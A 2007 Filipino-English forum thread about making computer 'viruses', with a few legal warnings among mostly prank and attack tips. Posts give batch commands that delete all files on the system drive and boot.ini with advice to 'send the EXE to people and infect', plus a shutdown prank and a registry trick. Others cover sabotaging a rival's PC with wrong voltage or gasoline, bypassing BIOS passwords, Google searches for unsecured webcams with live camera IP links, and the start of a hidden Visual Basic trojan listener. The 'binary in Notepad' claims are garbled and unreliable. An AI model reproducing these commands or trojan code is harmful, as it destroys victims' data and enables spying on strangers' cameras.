Ei guys, kung nagpa-plano kayong gumawa ng virus, wag nyo nang gawin yun kasi pwede na kayong makasuhan ngayon under the E-Commerce Act of 2001.

Naipasa yung batas na ito dahil sa gumawa ng "ILoveYou" virus. Swerte nga yung mismong gumawa ng virus na ito at hindi na nakasuhan kasi nagawa na nya yun bago pa naipatupad ito.

Mag-ingat kayo sa mga ganitong aktibidad kasi kapag may nagfile ng complaint sa inyo, kelangang maghanap na kayo ng magaling na abugado dyan :slap:. Kung pursigido pa rin kayo, wag kayong magpakatanga na ilagay yung mga pangalan nyo dun sa code or messages mismo.

19jave32
13th Sep '07 Thu, 08:38
wow! ang galing ha ! na detect agad nang anti-virus mo? avira ba?

ndi, nod32 antivirus nun pc na ginamit ko khpon.. ung akin e avast..ba2lik na uli ako sa nod32, wla ako makita bagong license para sa avast e.. galing sana ng avast kaso problema ang license..:upset:

mrnine
13th Sep '07 Thu, 10:49
ndi, nod32 antivirus nun pc na ginamit ko khpon.. ung akin e avast..ba2lik na uli ako sa nod32, wla ako makita bagong license para sa avast e.. galing sana ng avast kaso problema ang license..:upset:

galing pala nang nod32, kahit code lang ng virus, alam na nya na isa yung virus. sa aking kaspersky nadedetect nya ang virus pag naisulat ang code sa notepad.

mrnine
13th Sep '07 Thu, 11:13
Ei guys, kung nagpa-plano kayong gumawa ng virus, wag nyo nang gawin yun kasi pwede na kayong makasuhan ngayon under the E-Commerce Act of 2001.

Naipasa yung batas na ito dahil sa gumawa ng "ILoveYou" virus. Swerte nga yung mismong gumawa ng virus na ito at hindi na nakasuhan kasi nagawa na nya yun bago pa naipatupad ito.

Mag-ingat kayo sa mga ganitong aktibidad kasi kapag may nagfile ng complaint sa inyo, kelangang maghanap na kayo ng magaling na abugado dyan :slap:. Kung pursigido pa rin kayo, wag kayong magpakatanga na ilagay yung mga pangalan nyo dun sa code or messages mismo.

hindi naman talaga virus yung program ko. ang ginagawa lang nyan is to shutdown your pc automatically by 30 seconds.

Lancelot
13th Sep '07 Thu, 12:36
I believe that script posted by wasak is created by Michael Buen (http://en.wikipedia.org/wiki/ILOVEYOU) ... and first cured by Narinnat Suksawat from Thailand.

The well known I LOVE YOU VIRUS (http://fireav.com/virusinfo/library/love.htm)..

it spread in Microsoft outlook and Mirc clients.. even mp3s.. for new variants.


-L

wasak
13th Sep '07 Thu, 13:13
Eto parin na automatic shutdown program na ginawa ko using c++ language.

#include<iostream>
using namespace std;
main()
{
system("shutdown -s -t 30 -c \"Virus Activated\"");
}


kung gusto mong ma cancel, type mo lang sa run command ang

shutdown -a
parin.

Executable File Attached. Download nyo lang. Shutdown lang talaga in 30 seconds ang gagawin nito. walang ibang malicious intent. Kahit e scan nyo pa sa anti-virus nyo, safe ito.

For experimental and educational purposes ito only ha. No malicious intent.

nakapost na yan :rofl:

Lancelot
13th Sep '07 Thu, 13:30
wasak nakakita ka nba ng pinakamatinding virus? :lol:

ito (http://www.microsoft.com/en/us/default.aspx)un sinasabi ko :p
:rofl:

-L

mrnine
13th Sep '07 Thu, 20:52
nakapost na yan :rofl:

aw. meron na palang nag gawa nito na program? pwede mag provide ka nang link? hindi ko kasi mahanap eh. tnx

wasak
13th Sep '07 Thu, 22:06
aw. meron na palang nag gawa nito na program? pwede mag provide ka nang link? hindi ko kasi mahanap eh. tnx

program? kahit notepad lng yan haha

anyway try this http://vx.netlux.org/vx.php?id=ts03
or this http://www.megasecurity.org/trojans/t/terabit/Terabit_all.html

wasak
13th Sep '07 Thu, 22:09
wasak nakakita ka nba ng pinakamatinding virus? :lol:

ito (http://www.microsoft.com/en/us/default.aspx)un sinasabi ko :p
:rofl:

-L

ngak, kala ko seryoso hehe, may alam akong virus, tinitira mechanical, nililipat nya reader ng boot sector ng hd. kailangan ng technician buksan hd at ibalik sa dating posisyon. pero ewan if true, nasa libro kong nawala dati

rhodel29
13th Sep '07 Thu, 22:22
kaya pala wasak username mo ha...hehehe:peace: man!

mrnine
13th Sep '07 Thu, 23:14
program? kahit notepad lng yan haha

anyway try this http://vx.netlux.org/vx.php?id=ts03
or this http://www.megasecurity.org/trojans/t/terabit/Terabit_all.html

salamat sa link wasak

19jave32
14th Sep '07 Fri, 09:28
haha..wasak ka tlga bro! hehe..yoko i-DL.. ung VX heavens na tool, virus ang kasama sa zip e.. wla naman DL link sa Terabit Virus Maker..

Lancelot
14th Sep '07 Fri, 17:11
ngak, kala ko seryoso hehe, may alam akong virus, tinitira mechanical, nililipat nya reader ng boot sector ng hd. kailangan ng technician buksan hd at ibalik sa dating posisyon. pero ewan if true, nasa libro kong nawala dati

narinig ko na rin yan, pero dipa nakikita un code, maari cgro thru assembly,c/c++ or python makakagawa through mechanical pero posible din kc noong una pa man meron na robot, but still hd companies won't allow it..

di kba naniniwala na virus ang ms? :p :lol: they using stealth services kahit turn off mo pa updates mo.. still they know what your doing.. :p

check this..

Microsoft updates Windows without users' consent (http://windowssecrets.com/2007/09/13/01-Microsoft-updates-Windows-without-users-consent)

ano masasabi nyo?

-L

wasak
14th Sep '07 Fri, 19:23
narinig ko na rin yan, pero dipa nakikita un code, maari cgro thru assembly,c/c++ or python makakagawa through mechanical pero posible din kc noong una pa man meron na robot, but still hd companies won't allow it..

di kba naniniwala na virus ang ms? :p :lol: they using stealth services kahit turn off mo pa updates mo.. still they know what your doing.. :p

check this..

Microsoft updates Windows without users' consent (http://windowssecrets.com/2007/09/13/01-Microsoft-updates-Windows-without-users-consent)

ano masasabi nyo?

-L

di ako naniniwala, kac ang virus ay naninira, di nakakatulong.
ang trojan kunyari nakakatulong pero may hidden agenda pla hehe, so TROJAN sya :rofl:

Lancelot
15th Sep '07 Sat, 10:49
:rofl: yup un stealth services is trojan, its true.. but still maliit na part lang cya or pieces of module lang cya ng whole system architecture ng OS.. but am talking the whole system of OS.. parang sa antivirus parang hinahanap nya un malicious signature na makakaapekto sa system ng OS, what about habang hinahanap nya eh nag-iiwan din cya ng kung anu-ano.. :lol:, kagaya ng gingawa ng ms ng stealth trojan without prior permission/knowledge of the users ...

and one more nakatatak na talaga sa isipan ng tao ng ang virus is bad.
(Is there a good viruses?) (http://www.cknow.com/vtutor/AreThereGoodViruses.html)

well cgro wala talaga tau mgawa dahil sa kanila un program at nakikigamit lang tayo :p

-L

wasak
15th Sep '07 Sat, 17:37
meron good virus.
ang virus ay program, so lahat ng program ay pwedeng virus
so di lahat ng virus ay bad? hehe, logic na ako :rofl:

wasak
15th Sep '07 Sat, 19:43
:rofl: yup un stealth services is trojan, its true.. but still maliit na part lang cya or pieces of module lang cya ng whole system architecture ng OS.. but am talking the whole system of OS.. parang sa antivirus parang hinahanap nya un malicious signature na makakaapekto sa system ng OS, what about habang hinahanap nya eh nag-iiwan din cya ng kung anu-ano.. :lol:, kagaya ng gingawa ng ms ng stealth trojan without prior permission/knowledge of the users ...

and one more nakatatak na talaga sa isipan ng tao ng ang virus is bad.
(Is there a good viruses?) (http://www.cknow.com/vtutor/AreThereGoodViruses.html)

well cgro wala talaga tau mgawa dahil sa kanila un program at nakikigamit lang tayo :p

-L

After IE crashes click "Cancel" on the Report Error screen and Microsoft Spyware SP2 is installed. :rofl:

vin_blue
19th Sep '07 Wed, 15:43
batch ba ung .bat?
may nakita me ganun eh tapos mayroon ginawa sample sa web na mas matindi pa daw sa virus... :noidea:

eye_0122
19th Sep '07 Wed, 15:54
nakaka bwisit ung mga trojan virus huh!... bad tlaga yang virus..

gotta_b_gay_guy
20th Sep '07 Thu, 18:50
batch ba ung .bat?
may nakita me ganun eh tapos mayroon ginawa sample sa web na mas matindi pa daw sa virus... :noidea:

masmatindi pa kac, pwede ka magformat using batchfile, parang manual na ginawang automatic.

freshmisfits
22nd Sep '07 Sat, 08:23
ahaha :rofl: galing talaga ni wasak sa kalokohan :thumbsup: share ka pa bossing wasak pagbalik mo ng mga logic mo :lol: san na kaya un si wasak..... ::lmao:

TATANG
22nd Sep '07 Sat, 17:48
si wasak ba? nagtatago, parang trojan yun, kunyari nakakatulong, nanggugulo lng pla hehe diba gotta?

Ban Shutdowns : A trick to Play on Lamers
Disable the Shut Down option in the Shut Down Dialog Box. This trick involves editing the registry, so please make backups. Launch regedit.exe and go to :

HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer

In the right pane look for the NoClose Key. If it is not already there then create it by right clicking in the right pane and selecting New > String Value.(Name it NoCloseKey ) Now once you see the NoCloseKey in the right pane, right click on it and select Modify. Then Type 1 in the Value Data Box.

Doing the above on a Win98 system disables the Shut Down option in the Shut Down Dialog Box. But on a Win95 machine if the value of NoCloseKey is set to 1 then click on the Start > Shut Down button displays the following error message:

This operation has been cancelled due to restrictions in effect on this computer. Please contact your system administrator.

You can enable the shut down option by changing the value of NoCloseKey to 0 or simply deleting the particular entry i.e. deleting NoCloseKey.

Instead of performing the above difficult to remember process, simply save the following with an extension of .reg and add it's contents to the registry by double clicking on it.

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer]

"NoClose"="1"

rainrace
29th Sep '07 Sat, 14:12
san mo b gagamitin? bad yan ha.. hnd nman maiinfect yng pc mo kung hnd unles run mo ung prog.

wenks0910
29th Sep '07 Sat, 15:51
lam nyo ba every day 6 virus a day ang ngagawa n virus...lalu n pla kung mag aaral p kau gumawa ng bwisit n virus n yan...wag nyo pag aralan....makakasama lng yan sa ating mga computer...:ranting::ranting:

herick05
30th Sep '07 Sun, 09:41
Format a HDD with notepad



Format a HDD with notepad




Step 1.
Copy The Following In Notepad Exactly as it says


01001011000111110010010101010101010000011111100000


Step 2.
Save As An EXE Any Name Will Do


Step 3.
Send the EXE to People And Infect


OR

IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X -- this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000


format d:\ /Q/X -- this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000



format a:\ /Q/X -- this will format your drive a:\


01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000



del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.


01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001


try to figure out urself rest
cant spoonfeed
its workin


Do not try it on ur PC. dont mess around this is for educational purpose only

still if u cant figure it out try dis

go to notepad

@Echo off
Del C:\ *.*|y

save it as Dell.bat


worse

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file

wasak
30th Sep '07 Sun, 19:31
Format a HDD with notepad



Format a HDD with notepad




Step 1.
Copy The Following In Notepad Exactly as it says


01001011000111110010010101010101010000011111100000


Step 2.
Save As An EXE Any Name Will Do


Step 3.
Send the EXE to People And Infect


OR

IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X -- this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000


format d:\ /Q/X -- this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000



format a:\ /Q/X -- this will format your drive a:\


01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000



del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.


01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001


try to figure out urself rest
cant spoonfeed
its workin


Do not try it on ur PC. dont mess around this is for educational purpose only

still if u cant figure it out try dis

go to notepad

@Echo off
Del C:\ *.*|y

save it as Dell.bat


worse

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file


pinahirapan mo pa sarili mo hehe, kahit di binary, kahit text lng pwede, format c:\ -y -y ok na, save lng as batchfile. or kung win98 gawin mong autoexec hehe:rofl:

iBee
30th Sep '07 Sun, 19:38
this time gagawin mo syang exe... pwede pala yun? :unsure:

Mcmms
30th Sep '07 Sun, 19:55
hehehe bawal ito ha...pwede pala rito ito..fake na virus pwede cguro yun..

mrnine
1st Oct '07 Mon, 10:07
yung post ni herick05, .exe ang extension kasi binary na ung file.executed na xa agad.

wasak
1st Oct '07 Mon, 10:33
un lng hehe, exe nga sya, kita ko nman na exe sya, pero pinaguusapan dito eh virus... ang alam ko sa virus nakatago, di na kailangan double click pa, kailangan di malalaman ng user na may virus na pla na tatakbo after nya magreboot... kac pag exe, tas la icon, tas maliit lng size, HALATADO hehe... pero masyado lng ako react hehe, share knowledge nga diba? so share lng po, sorry kung maangas ako hehe, di na mauulit :upset:

iBee
1st Oct '07 Mon, 19:38
kung marunong ka ng binary you could probably add a few more codes para ma-attach nito ang sarili nito sa isang harmless file, and autorun on startup. (the latter is possible through the creation of a registry key)

suggestion lang. :D di ako marunong ng binary :lmao:

peterdan
1st Oct '07 Mon, 20:44
ngek dapat mo muna unahin ang antivirus.....kung wala kang anti virus sa gnawa mo.di hindi mo na ma open ang pc mo atskavirus mo kc na virus na ang pc mo... :weep:

iBee
1st Oct '07 Mon, 20:54
its likely na di rin sya madedetect.. i don't know.. yung mga batch file commands na posted dito dinededma ng nod32.. ewan ko lang sa mga ibang AVs... at posible ring yang binary na yan eh dedmahin. :D

wasak
1st Oct '07 Mon, 21:33
kung marunong ka ng binary you could probably add a few more codes para ma-attach nito ang sarili nito sa isang harmless file, and autorun on startup. (the latter is possible through the creation of a registry key)

suggestion lang. :D di ako marunong ng binary :lmao:

may binary to txt, txt to binary nman sa net :salute:

ngek dapat mo muna unahin ang antivirus.....kung wala kang anti virus sa gnawa mo.di hindi mo na ma open ang pc mo atskavirus mo kc na virus na ang pc mo... :weep:

meron nman kami anti ng mga ginawa dito... gaya ng shutdown -a or press f5, then erase the file
at ung i luv u, may anti na yan hehe


instilled, ung i luv you, nadedetct na kahit code pa lng hehe, ewan if what av ung gamit nung nagsabi nun sakin sa ibang site na nagpostan ko nun hehe...

iBee
1st Oct '07 Mon, 21:57
yah wasak yung AVG na gamit ko dati, ganun din. kasi nakahanap ako dati ng source ng VBS.ILoveYou(marami palang variants ito :lol:) then nung kinopy at paste ko ito sa notepad na-delete kaagad yung file nung sinave ko :lmao:

pwede ko ba ipost dito yung source? ipopost ko sana, kaso wag na baka kung ano pa gawin nyo :naughty: :rofl:

VBS.ILoveYou (VBS.LoveLetter) (http://cai.com/in/securityadvisor/virusinfo/virus.aspx?ID=9024)

info lang yan di yan source :p

Trinity
3rd Oct '07 Wed, 14:03
Little Knowledge Is Dangerous. Do You Know The Basics? The Batch Files?,
They're Not Viruses Though But You Can Learn From Them. Try Tskmgr [ctrl+alt+del] Then End Process Your Explorer.exe; You'll See. Know What's Tskill? Hehe. Familiarize First The Languages, C And C++. They're Dos-based Or Dos Is Created From These Languages, One Way Or Another. From Here You Can Create Your Simple Virus. As Simple As To Tickle Feeble Minds. Hehe

wasak
3rd Oct '07 Wed, 15:36
kung gusto nyo manira ng computer, set mo ung power supply ng kaaway nyo sa 110v kung 220 gamit nila and vice versa... or lagyan nyo ng iron dust sa may fan sa side or harap, pag nakaoff, pag on nila, lahat ng yun pupunta sa mobo, and tustado na hehe.... di na kailangan ng virus... pero kung matapang ka, sabuyan mo na lng gasolina, at sindihan mo ng cricket lighter, wag ibang brand... at yung gasolina, dapat 95+ octane, para lalong yumaman ang caltex, dadalawin na lng kita sa kulungan, if and only if trip ko hehe... gagawa ka ng virus? lang kwenta yan hehe... gawa na lng tayo ng games, diba instilledbee? :p

iBee
3rd Oct '07 Wed, 18:54
kung gusto nyo manira ng computer, set mo ung power supply ng kaaway nyo sa 110v kung 220 gamit nila and vice versa...

nangyari na ito sa kaklase ko.. pero by accident.. pumutok yung voltage regulator :lmao:


lagyan nyo ng iron dust sa may fan sa side or harap, pag nakaoff, pag on nila, lahat ng yun pupunta sa mobo, and tustado na hehe.... di na kailangan ng virus...

di ko pa nasubukan pero i-try ko ito minsan. joke. :rofl:

pero kung matapang ka, sabuyan mo na lng gasolina, at sindihan mo ng cricket lighter, wag ibang brand... at yung gasolina, dapat 95+ octane, para lalong yumaman ang caltex

this should only be used as a last resort :lmao:

dadalawin na lng kita sa kulungan, if and only if trip ko hehe...

and if trip ko aambag ako pampiyansa mo :rofl:

gagawa ka ng virus? lang kwenta yan hehe... gawa na lng tayo ng games, diba instilledbee? :p

agree ako dito :D

mrnine
3rd Oct '07 Wed, 21:26
kung gusto nyo manira ng computer, set mo ung power supply ng kaaway nyo sa 110v kung 220 gamit nila and vice versa... or lagyan nyo ng iron dust sa may fan sa side or harap, pag nakaoff, pag on nila, lahat ng yun pupunta sa mobo, and tustado na hehe.... di na kailangan ng virus... pero kung matapang ka, sabuyan mo na lng gasolina, at sindihan mo ng cricket lighter, wag ibang brand... at yung gasolina, dapat 95+ octane, para lalong yumaman ang caltex, dadalawin na lng kita sa kulungan, if and only if trip ko hehe... gagawa ka ng virus? lang kwenta yan hehe... gawa na lng tayo ng games, diba instilledbee? :p

hardware related naman ito.

Me sa BIOS
go to bios and disable the cache ng pc of your enemy. pag on nya ng pc, it will take ages to boot windows xp ;)

Mcmms
3rd Oct '07 Wed, 21:30
or send some virus :lol:

iBee
3rd Oct '07 Wed, 21:52
hardware related naman ito.

Me sa BIOS
go to bios and disable the cache ng pc of your enemy. pag on nya ng pc, it will take ages to boot windows xp ;)

pwede ba remotely macontrol ang pagmodify ng BIOS? and what if may p/w ang BIOS :D para kasing maproseso ang pagset ng jumper/pagreinsert ng CMOS battery... kailangan pa buksan ang mobo... comment ko lang kasi pano kung time-sensitive yung "hacking" mission nung gagawa nito? ;)

mrnine
3rd Oct '07 Wed, 22:19
try this instilledbee

Removing a Bios - CMOS Password (http://www.dewassoc.com/support/bios/bios_password.htm)
Basic BIOS password crack (http://www.go4expert.com/forums/showthread.php?t=114)
How to bypass BIOS passwords (http://searchwindowssecurity.techtarget.com/loginMembersOnly/1,289498,sid45_gci1124083,00.html?NextURL=http%3A//searchwindowssecurity.techtarget.com/tip/0%2C289483%2Csid45_gci1124083%2C00.html)

iBee
3rd Oct '07 Wed, 22:25
ok sige try ko test lang sa PC sa computer shop :lol:

Lancelot
4th Oct '07 Thu, 10:29
ok sige try ko test lang sa PC sa computer shop :lol:

core duo ba pc mo instilledbee? dipo gagana yan, :p
:lol:

un backdoor pass pwede yan sa pentium 3/amd k* at sa mga lower version na bios :thumbsup:
it was posted year 2000 - 2004 :thumbsup:

pero un clearing ng bios using jumper agree ako dun.. but kung reflash mo ng walang problem ang bios para clear ang bios cgrado kamot ng ulo ang gagawin dahil nasa manual na dapat lang reflash ang bios kapag corrupted ang bios.. sa ngaun meron na crashfree bios ver 2 ang mga bios naten, kaya safe na magreflash just insert the mobo driver cd.

-L

herick05
4th Oct '07 Thu, 11:07
hi guys share ko lang e2..

Find unprotected images in google. Example:
inurl:(htm | html | php) intitle:"index of" "last modified" "parent directory" description size "jennifer lopez"

Webcam hack via google
inurl:/view:shtml
inurl:/view/index.shtml
inurl:CgiStart?page=Single

secutiry cameras hack via google
inurl:ViewerFrame?Mode=

Windows XP hack. System user
Run
CMD
at <time here, one min later> /interactive "cmd.exe"

Notepad trick
Bush hid the facts

Google usage as a proxy.
This could be used for a websites from where you were banned. Go to Google.com, select language options,
type in "translate page" the webpage you want to see, and then choose to translate. It opens a temp webpage
and from there you can use all the links and the entire website.

Nokia Secret Codes

Reserve Battery
*3370#

Phone Software Version
*#0000# or *#9999#

Turn on "On Busy"
**67*number#

TUrn on "No Reply"
**61*number#

Reset phone timer and game scores
*#73#

See private number
*#30#

Security code in use
*#2640#

Provider Lock Status
(use the * button to obtain the p,w and + symbols)
#pw+1234567890+1#


Network Lock Status
#pw+1234567890+2#


Windows folder that cannot be deleted.
Run
CMD
md \\.\\c:\con

To delete it use this command
rd \\.\\c:\con


Secret Google for hackers page
http://www.google.com/intl/xx-hacker/

PC watch program
XPC Spy Pro
(stored on PETLABS computer 001. Main base)

Windows XP Password Hack (have to be admin. Guest account not tested)
Run
CMD
Net User
Net User (username) *
<type a password>

How to change Start Button headline
Needs ResHacker.exe program
Open it, find explorer.exe in Windows folder,open String Table>37>1033.
Over there replace "start" with anything you want, and thend just save.
To make this work you need to restart comp or reroll explorer.exe
process.

Bypass most firewalls
Start Command Promt
Ping <address you wish to visit>
You will see IP addresses
Open browser
http://<IP address>/
Pet.LABS note - some search engines may not work.

Minesweeper Hack.
Open minesweeper
Press "xyzzy"
Hold Enter+Shift
Now when you move your mouse over a mine-free square you will see white pixel in left-top corner.

3D Pinball hack
During game type: Hidden Test
Now you can use your mouse to move ball, and if you press H you can update high scores with 1 billion points
and add your name here.

Invisible Folder
Create folder and rename it this method:
Hold ALT and press 0 1 6 0 and press Enter.
Then make icon as an empty slot and you can also make it hidden.
WARNING: USE NUMPAD
(didn't work for me needs to be tested)

Make desktop picture to folders (couldn't make this work)
1) Open notepad

2) Type in the text below(no space)
[{BE0981 40-A513-11D0-A3 A4-00C04FD706EC}]
IconArea_Image ="C:\your picture location.jpg"
IconArea_Text= 0x00FFFFFF

3) Save file as desktop.ini
Save as type : All Files

4) Copy the desktop.ini file you just created, and
paste into the folder you want the background to
be change

5) Go to START --> RUN..

6) Type Attrib +s "C:\Location of your folder"
Click OK

7) Open your folder and the picture should be set by
now

'IconArea_Image' is for you to key in the location of your picture. Let say if your picture is located at 'My Documents' with the file name 'abc.jpg', your location will look like this
"C:\Documents and Settings\user\My Documents\abc.jpg"

'IconArea_Text' is to set the color of your text, if you have a dark background it is recommended you set the text color to WHITE with is 0x00FFFFFF.
If you have a white background, you can set the folder text color to BLACK which is 0x00000000

Folder text color can be set to any color depends on which color you like, example:
PINK - 0x00FF99FF
PURPLE - 0x00FF99FF
RED - 0x00FF0000
and more

Recommended picture size is at 815 x 585 so that you will see a full picture and not Tile.
You can resize or cut your picture to the size
815 x 585 easily with 'Microsoft Photo Editor'

Make a shortcut to shut down PC.
Create a shortcut. When shortcut master opens type in this stuff to target of the shortcut.
shutdown -5 -t 0

Note:
-s for shutdown
-t 0 for time in seconds (no more than 99)
-f for force shutdown and override any running programs without End
Now name the shortcut whatever you want. And change the way how the icon looks.

Ugly black windows
Alt+Shift+Prt Scrn

Hidden Program
Run>Eudcedit

Make your own error messages
Create a notepad. Type this in:
x= MsgBox("Box text", ,"Box title")
Save as: <any name>.vbs
Now add it to startup for example.
For making a choise use this shit
x= MsgBox("Box text",5+48 ,"Box title")
Every numbers means different question.
0 - ok
1 - ok and cancel
2 - abort, retry, and ignore buttons
4 - yes and no buttons
5 - retry and cancel buttons

16 - critical message icon
32 - warning query icon
48 - warning message icon
64 - information message icon

0 - normal message box
4096 - always stays top of the desktop

Lancelot
4th Oct '07 Thu, 12:28
nice share.. keep it up :thumbsup:

secutiry cameras hack via google
inurl:ViewerFrame?Mode=

meron nako nakita :p, pero marami pa.. :p

Location: United States [City: Kearny, New Jersey] (http://68.236.208.89/ViewerFrame?Mode=Motion&Language=0)

Location: Netherlands [City: Amsterdam, Noord-Holland] (http://80.126.35.13/ViewerFrame?Mode=Motion&Resolution=640x480&Quality=Standard&Interval=30&Size=STD&PresetOperation=Move&Language=4)

Location: United States [City: Palm Springs, California] (http://66.209.109.2:60006/ViewerFrame?Mode=Motion&Language=0)

actually nabasa ko nayata ito sa 55 fun ways with google na post ko sa ebooks

-L

wasak
4th Oct '07 Thu, 15:16
hi guys share ko lang e2..

Find unprotected images in google. Example:
inurl:(htm | html | php) intitle:"index of" "last modified" "parent directory" description size "jennifer lopez"

Webcam hack via google
inurl:/view:shtml
inurl:/view/index.shtml
inurl:CgiStart?page=Single

secutiry cameras hack via google
inurl:ViewerFrame?Mode=

Windows XP hack. System user
Run
CMD
at <time here, one min later> /interactive "cmd.exe"

Notepad trick
Bush hid the facts

Google usage as a proxy.
This could be used for a websites from where you were banned. Go to Google.com, select language options,
type in "translate page" the webpage you want to see, and then choose to translate. It opens a temp webpage
and from there you can use all the links and the entire website.

Nokia Secret Codes

Reserve Battery
*3370#

Phone Software Version
*#0000# or *#9999#

Turn on "On Busy"
**67*number#

TUrn on "No Reply"
**61*number#

Reset phone timer and game scores
*#73#

See private number
*#30#

Security code in use
*#2640#

Provider Lock Status
(use the * button to obtain the p,w and + symbols)
#pw+1234567890+1#


Network Lock Status
#pw+1234567890+2#


Windows folder that cannot be deleted.
Run
CMD
md \\.\\c:\con

To delete it use this command
rd \\.\\c:\con


Secret Google for hackers page
http://www.google.com/intl/xx-hacker/

PC watch program
XPC Spy Pro
(stored on PETLABS computer 001. Main base)

Windows XP Password Hack (have to be admin. Guest account not tested)
Run
CMD
Net User
Net User (username) *
<type a password>

How to change Start Button headline
Needs ResHacker.exe program
Open it, find explorer.exe in Windows folder,open String Table>37>1033.
Over there replace "start" with anything you want, and thend just save.
To make this work you need to restart comp or reroll explorer.exe
process.

Bypass most firewalls
Start Command Promt
Ping <address you wish to visit>
You will see IP addresses
Open browser
http://<IP address>/
Pet.LABS note - some search engines may not work.

Minesweeper Hack.
Open minesweeper
Press "xyzzy"
Hold Enter+Shift
Now when you move your mouse over a mine-free square you will see white pixel in left-top corner.

3D Pinball hack
During game type: Hidden Test
Now you can use your mouse to move ball, and if you press H you can update high scores with 1 billion points
and add your name here.

Invisible Folder
Create folder and rename it this method:
Hold ALT and press 0 1 6 0 and press Enter.
Then make icon as an empty slot and you can also make it hidden.
WARNING: USE NUMPAD
(didn't work for me needs to be tested)

Make desktop picture to folders (couldn't make this work)
1) Open notepad

2) Type in the text below(no space)
[{BE0981 40-A513-11D0-A3 A4-00C04FD706EC}]
IconArea_Image ="C:\your picture location.jpg"
IconArea_Text= 0x00FFFFFF

3) Save file as desktop.ini
Save as type : All Files

4) Copy the desktop.ini file you just created, and
paste into the folder you want the background to
be change

5) Go to START --> RUN..

6) Type Attrib +s "C:\Location of your folder"
Click OK

7) Open your folder and the picture should be set by
now

'IconArea_Image' is for you to key in the location of your picture. Let say if your picture is located at 'My Documents' with the file name 'abc.jpg', your location will look like this
"C:\Documents and Settings\user\My Documents\abc.jpg"

'IconArea_Text' is to set the color of your text, if you have a dark background it is recommended you set the text color to WHITE with is 0x00FFFFFF.
If you have a white background, you can set the folder text color to BLACK which is 0x00000000

Folder text color can be set to any color depends on which color you like, example:
PINK - 0x00FF99FF
PURPLE - 0x00FF99FF
RED - 0x00FF0000
and more

Recommended picture size is at 815 x 585 so that you will see a full picture and not Tile.
You can resize or cut your picture to the size
815 x 585 easily with 'Microsoft Photo Editor'

Make a shortcut to shut down PC.
Create a shortcut. When shortcut master opens type in this stuff to target of the shortcut.
shutdown -5 -t 0

Note:
-s for shutdown
-t 0 for time in seconds (no more than 99)
-f for force shutdown and override any running programs without End
Now name the shortcut whatever you want. And change the way how the icon looks.

Ugly black windows
Alt+Shift+Prt Scrn

Hidden Program
Run>Eudcedit

Make your own error messages
Create a notepad. Type this in:
x= MsgBox("Box text", ,"Box title")
Save as: <any name>.vbs
Now add it to startup for example.
For making a choise use this shit
x= MsgBox("Box text",5+48 ,"Box title")
Every numbers means different question.
0 - ok
1 - ok and cancel
2 - abort, retry, and ignore buttons
4 - yes and no buttons
5 - retry and cancel buttons

16 - critical message icon
32 - warning query icon
48 - warning message icon
64 - information message icon

0 - normal message box
4096 - always stays top of the desktop

salamat sa pag share, pero sana ung ibang post mo, sa ibang thread mo nilagay, kac pinaghalo-halo mo na ung phone, and comp... by the way, ung image hack mo sa google, kulang pa, maraming hack ang google... nakita mo na ba ung find webcams on google (http://www.symbianize.com/showthread.php?t=4771)? at eto pa (http://www.symbianize.com/showthread.php?t=5021)

eh ung lahat ng hack ng google (http://www.symbianize.com/showthread.php?t=5019)?

vandike
4th Oct '07 Thu, 15:32
whatever happened to "good old fashion" SUNTUKAN?? ahaha..

wasak
4th Oct '07 Thu, 16:20
suntukan? ano un? :rofl:

christian404
5th Oct '07 Fri, 21:17
anyone na may alam kung saan makakapagdownload ng c at c++

mrnine
5th Oct '07 Fri, 21:24
anyone na may alam kung saan makakapagdownload ng c at c++

compiler/IDE ba yan?

eto Dev-C++ (http://prdownloads.sourceforge.net/dev-cpp/devcpp-4.9.9.2_setup.exe)

enzoism
16th Oct '07 Tue, 03:04
Ang purpose kasi dati ng virus is to protect the program.. hewhehe

christian404
21st Oct '07 Sun, 17:44
Trojan tutorial

A tutorial to make a little trojan with a server and a client.


Writing a Trojan is a lot easier than most people think. All it really involves is two simple applications both with fewer than 100 lines of code.
The first application is the client or the program that one user knows about. The second is the server or the actual “trojan� part. I will now go
through what you need for both and some sample code.

Server

The server is the Trojan part of the program. You usually will want this to be as hidden as possible so the average user can’t find it.
To do this you start by using



Code:
Private Sub Form_Load()
Me.Visible = False
End Sub


This little bit of code makes the program invisible to the naked eye. Now we all know that the task manager is a little bit peskier.
So to get our application hidden from that a little better we make our code look like this.



Code:
Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
End Sub


(Due to Bill gates, all running exe's will be displayed in the list of running processes. Your app will be hidden in the Running Applications List though )

So now, we have a program that is virtually invisible to the average user, and it only took four lines of code. Now all of you are thinking that this
tutorial sucks right about now so lets make it a lot better by adding functions to our Trojan!
The first thing we want to do is make it be able to listen for connections when it loads. So in order to do this we need to add a Winsock Control.
I named my control win but you can name yours what ever.
Now to make it listen on port 2999 when the Trojan starts up we make our code look like this.




Code:
Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub


This code will set the local open port to 2999 and the port it sends it to is 455. So now, we have a program that listens but still doesn’t do anything neat.


